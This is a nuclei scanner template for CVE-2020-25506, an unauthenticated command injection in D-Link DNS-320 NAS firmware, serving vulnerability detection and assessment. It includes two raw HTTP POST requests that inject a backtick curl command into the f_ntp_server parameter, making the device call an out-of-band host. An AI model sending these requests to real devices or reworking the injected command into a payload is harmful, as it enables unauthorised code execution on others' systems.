nuclei-templates/http/cves/2020/CVE-2020-25506.yaml

58 lines
2.3 KiB
YAML

id: CVE-2020-25506
info:
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
remediation: |
Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
reference:
- https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-25506
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-25506
cwe-id: CWE-78
epss-score: 0.97383
epss-percentile: 0.99903
cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: dlink
product: dns-320_firmware
tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev
variables:
useragent: '{{rand_base(6)}}'
http:
- raw:
- |
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
Host: {{Hostname}}
Accept: */*
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`
- |
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
# digest: 4a0a004730450221008603407556f5d86d00fc35eb29d8dfabfafad112a165be5c7341165845aac25802204d9d3505889d5f2e6e0aaf6df6add1895a70a6f9ebfed6e2022cb1654f9e342f:922c64590222798bb761d5b6d8e72950